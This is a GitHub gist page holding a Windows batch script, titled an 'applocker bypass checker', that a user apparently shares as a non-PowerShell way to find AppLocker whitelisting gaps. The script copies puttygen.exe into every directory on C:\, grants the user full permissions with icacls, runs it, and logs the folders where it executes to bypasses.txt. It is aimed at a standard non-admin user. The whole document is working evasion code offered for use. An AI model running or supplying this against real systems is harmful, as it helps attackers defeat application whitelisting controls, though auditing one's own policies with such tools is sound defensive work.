-
-
Save nani1337/8f3875323e08498684db56d3dee1e985 to your computer and use it in GitHub Desktop.
applocker bypass checker
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| @echo off | |
| REM Influenced by the Powershell-based AppLocker Bypass Checker (created by Tom Aafloen), which attempts to find folder that are both writable | |
| REM and executable under C:\Windows (whitelisted by AppLocker default rules). | |
| REM | |
| REM However, environments implementing application whitelisting may also block powershell.exe. | |
| REM | |
| REM This intends to be a non-PowerShell method of finding AppLocker bypasses under the entire C:\. Replace puttygen.exe as appropriate. Run as a | |
| REM standard (non-admin) user ;D. Bypasses listed in bypasses.txt | |
| C: | |
| cd C:\TEMP\ | |
| echo Creating list of all directories and sub-directories | |
| dir C:\ /s /b /o:n /a:d > C:\Temp\dirs.txt | |
| echo Attempting to copy puttygen.exe to all folders | |
| for /F "tokens=*" %%A in (dirs.txt) do copy "C:\Temp\puttygen.exe" "%%A" /Y | |
| echo Attempting to execute puttygen.exe (find whitelisted locations) | |
| for /F "tokens=*" %%A in (dirs.txt) do if exist "%%A\puttygen.exe" icacls "%%A\puttygen.exe" /grant %USERNAME%:f & start "" "%%A\puttygen.exe" && tasklist /v | findstr "puttygen.exe" > executed.txt && for %%B in (executed.txt) do if not %%~zB==0 echo %%A >> bypasses.txt && taskkill /IM puttygen.exe /F && del /F executed.txt | |
| echo Deleting puttygen.exe from all locations | |
| for /F "tokens=*" %%A in (dirs.txt) do del /F "%%A\puttygen.exe" | |
| echo Done |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment